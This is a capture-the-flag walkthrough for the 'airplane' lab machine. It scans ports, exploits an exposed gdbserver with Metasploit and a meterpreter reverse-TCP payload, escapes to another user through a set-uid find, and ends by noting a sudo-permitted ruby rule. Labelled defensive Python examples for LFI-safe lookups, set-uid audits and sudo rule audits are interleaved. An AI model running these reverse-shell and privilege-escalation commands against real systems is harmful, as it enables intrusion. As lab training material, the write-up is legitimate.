Add the airplane.thm domain to /etc/hosts on our machine.
Enumeration
# nmap -sV -sV -p- -Pn 10.10.217.1 -oN scan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-09 16:11 UTC
Nmap scan report for ip-10-10-217-1.eu-west-1.compute.internal (10.10.217.1)
Host is up (0.0046s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
6048/tcp open x11?
8000/tcp open http-alt Werkzeug/3.0.2 Python/3.8.10
We notice port 8000, which appears to be a web server, so we visit the web page.
The page parameter of the web application is vulnerable to local file inclusion (LFI).
After a more thorough enumeration of the server we find gdbserver, a rather unusual application, running on port 6048.
We find that gdbserver on Linux can be exploited by creating an ELF binary with msfvenom or, alternatively, by using Metasploit directly.
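As an added illustration (not code from the room or from its web application, whose source is not shown), here is the file-read pattern that produces this kind of LFI in a Python/Werkzeug handler, next to a hardened lookup. The page directory, the .html suffix and the function names are assumptions for the example; the demo builds its own throwaway directory tree as constructed sample data.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional

PAGE_SUFFIX = ".html"  # assumed suffix of legitimate pages


def read_page_unsafe(base_dir: str, page: str) -> str:
    """Vulnerable handler logic (assumed; the room's own source is not shown).

    os.path.join() discards base_dir completely when ``page`` is absolute,
    and "../" components walk out of base_dir. Either way the client chooses
    which file is read: classic local file inclusion.
    """
    with open(os.path.join(base_dir, page), encoding="utf-8") as f:
        return f.read()


def resolve_page_safe(base_dir: str, page: str) -> Optional[Path]:
    """Hardened lookup: accept only a bare file name with the expected suffix,
    then re-check the resolved path so a symlink cannot point outside base_dir."""
    base = Path(base_dir).resolve()
    if not page or any(c in page for c in "/\\\0") or not page.endswith(PAGE_SUFFIX):
        return None
    candidate = (base / page).resolve()
    # The only acceptable location is a regular file directly inside base_dir.
    if candidate.parent != base or not candidate.is_file():
        return None
    return candidate


def read_page_safe(base_dir: str, page: str) -> Optional[str]:
    target = resolve_page_safe(base_dir, page)
    return None if target is None else target.read_text(encoding="utf-8")


def demo() -> dict:
    """Constructed sample tree: pages/index.html plus a secret outside the page dir."""
    with tempfile.TemporaryDirectory() as tmp:
        pages = Path(tmp) / "pages"
        pages.mkdir()
        (pages / "index.html").write_text("<h1>home</h1>", encoding="utf-8")
        secret = Path(tmp) / "secret.txt"
        secret.write_text("SECRET", encoding="utf-8")
        return {
            "unsafe_traversal": read_page_unsafe(str(pages), "../secret.txt"),
            "unsafe_absolute": read_page_unsafe(str(pages), str(secret)),
            "safe_traversal": read_page_safe(str(pages), "../secret.txt"),
            "safe_absolute": read_page_safe(str(pages), str(secret)),
            "safe_normal": read_page_safe(str(pages), "index.html"),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The safe version deliberately rejects any separator instead of trying to normalise the path: an allowlist of file names is easier to reason about than a denylist of traversal sequences, and the post-resolve parent check catches the symlink case that string filtering alone misses.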
msf6 exploit(multi/gdb/gdb_server_exec) > show options
Module options (exploit/multi/gdb/gdb_server_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
EXE_FILE /bin/true no The exe to spawn when gdbserver is not attached to a process.
RHOSTS 10.10.89.58 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 6048 yes The target port (TCP)
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.43.74 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 x86_64
We gained access to the target machine.
msf6 exploit(multi/gdb/gdb_server_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 2617 created.
Channel 2 created.
/bin/bash -i
bash: cannot set terminal process group (2597): Inappropriate ioctl for device
bash: no job control in this shell
hudson@airplane:/opt$ id
id
uid=1001(hudson) gid=1001(hudson) groups=1001(hudson)
After that we search for set-uid binaries owned by carlos using find.
hudson@airplane:/home$ find / -user carlos -perm -u=s 2>/dev/null
find / -user carlos -perm -u=s 2>/dev/null
/usr/bin/find
Let's look up find on GTFOBins.
find . -exec /bin/sh -p \; -quit
This allowed us to access another user's files.
hudson@airplane:/home$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
id
uid=1001(hudson) gid=1001(hudson) euid=1000(carlos) groups=1001(hudson)
ls
carlos
hudson
cd carlos
ls
...SNIP...
Public
Templates
Videos
user.txt
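The defender's counterpart to the find command above is a periodic set-uid audit. The following is an added example, not code from the room: it walks a tree, lists every regular file with the set-uid bit (what find / -perm -u=s prints) and sorts the hits into the buckets an auditor acts on first. The SHELL_CAPABLE list is a constructed short excerpt in the spirit of GTFOBins, and the demo builds its own throwaway files as constructed sample data.

```python
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Programs known to hand the caller a shell or a file read when set-uid.
# Constructed short list for this example; the real catalogue is longer.
SHELL_CAPABLE = {"find", "bash", "sh", "env", "python3", "ruby", "perl", "vim", "less"}


def find_suid(root: str) -> List[Tuple[str, int]]:
    """Return (path, owner uid) for every regular file under `root` with the
    set-uid bit, the same set that `find / -perm -u=s` lists."""
    hits: List[Tuple[str, int]] = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def classify(hits: List[Tuple[str, int]]) -> Dict[str, List[str]]:
    """Split the set-uid list into review buckets.

    shell_capable : base name is a program that gives a shell as the owner
                    (the /usr/bin/find case in this room).
    non_root_owner: owned by an ordinary account, so it grants that
                    account's identity to anyone who can execute it.
    other         : everything else, to compare against the distro's
                    expected set-uid list (passwd, sudo, ...)."""
    out: Dict[str, List[str]] = {"shell_capable": [], "non_root_owner": [], "other": []}
    for path, uid in hits:
        if os.path.basename(path) in SHELL_CAPABLE:
            out["shell_capable"].append(path)
        elif uid != 0:
            out["non_root_owner"].append(path)
        else:
            out["other"].append(path)
    return out


def demo() -> Dict[str, List[str]]:
    """Constructed sample tree: a set-uid file named 'find', a set-uid 'helper'
    and a plain binary. Needs no privileges: chmod u+s works on files you own."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("find", 0o4755), ("helper", 0o4755), ("plain", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "w", encoding="utf-8") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        result = classify(find_suid(tmp))
        # Keep only base names so the output does not depend on the temp path.
        return {k: sorted(os.path.basename(p) for p in v) for k, v in result.items()}


if __name__ == "__main__":
    print(demo())
```

Which bucket 'helper' lands in depends on who runs the demo (root owner goes to other, anyone else to non_root_owner); 'find' is always flagged as shell capable, which is exactly the finding that should have been raised for /usr/bin/find owned by carlos on this box.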
On our machine, we need to generate a public key.
root@ip-10-10-43-74:~# ssh-keygen
Send the public key created on our machine to the target machine so that we can log in as carlos over SSH.
root@ip-10-10-43-74:~# ssh carlos@10.10.89.58
The authenticity of host '10.10.89.58 (10.10.89.58)' can't be established.
ECDSA key fingerprint is SHA256:RJRrbBrzRaN6WBmh5/0D/kOxpngC7XArEPxBegq5N20.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.89.58' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-139-generic x86_64)
Expanded Security Maintenance for Applications is not enabled.
ubuntu.com/esm or run: sudo pro status
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
carlos@airplane:~$ id
uid=1000(carlos) gid=1000(carlos) groups=1000(carlos),27(sudo)
Privilege escalation
carlos@airplane:~$ sudo -l
Matching Defaults entries for carlos on airplane:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User carlos may run the following commands on airplane:
(ALL) NOPASSWD: /usr/bin/ruby /root/*.rb
Every file with the .rb extension can be executed as root, so we create a script to read the flag.
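To see why this sudo rule is the weak point, here is an added example (not from the room) that audits rule lines in the form sudo -l prints them and flags the three properties that combine here: no password, an interpreter as the command, and a wildcard instead of one vetted script. The first sample rule is the one from the output above; the other two and the INTERPRETERS list are constructed for contrast.

```python
import os
import re
from typing import Dict, List

# Rule lines as `sudo -l` prints them. The first is this room's rule;
# the other two are constructed for contrast.
SAMPLE_RULES: List[str] = [
    "(ALL) NOPASSWD: /usr/bin/ruby /root/*.rb",
    "(root) /usr/bin/systemctl restart nginx",
    "(ALL) NOPASSWD: /usr/bin/apt-get update",
]

# Commands that execute whatever source they are handed (constructed list).
INTERPRETERS = {"ruby", "python", "python3", "perl", "bash", "sh", "node"}

# "(runas) TAG: TAG: command args..."
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def audit_rule(rule: str) -> Dict[str, object]:
    """Parse one rule and return the risk findings for it."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError(f"unrecognised sudoers rule: {rule!r}")
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    cmd, *args = m.group("cmd").split()
    findings: List[str] = []
    if "NOPASSWD" in tags:
        findings.append("NOPASSWD: no password prompt, so a hijacked session escalates silently")
    if os.path.basename(cmd) in INTERPRETERS:
        findings.append("interpreter: runs whatever script it is given, not one fixed program")
    if any(ch in arg for arg in args for ch in "*?["):
        findings.append("wildcard argument: the rule matches a set of scripts, not one vetted file")
    return {"runas": m.group("runas"), "command": cmd, "args": args, "findings": findings}


def audit_all(rules: List[str]) -> List[Dict[str, object]]:
    return [audit_rule(r) for r in rules]


if __name__ == "__main__":
    for r in audit_all(SAMPLE_RULES):
        print(r["command"], r["args"], "->", r["findings"] or ["ok"])
```

The fix on the defensive side is the mirror image of the findings: name one exact, root-owned and non-writable script rather than an interpreter plus a glob, and reserve NOPASSWD for commands whose arguments are fully fixed.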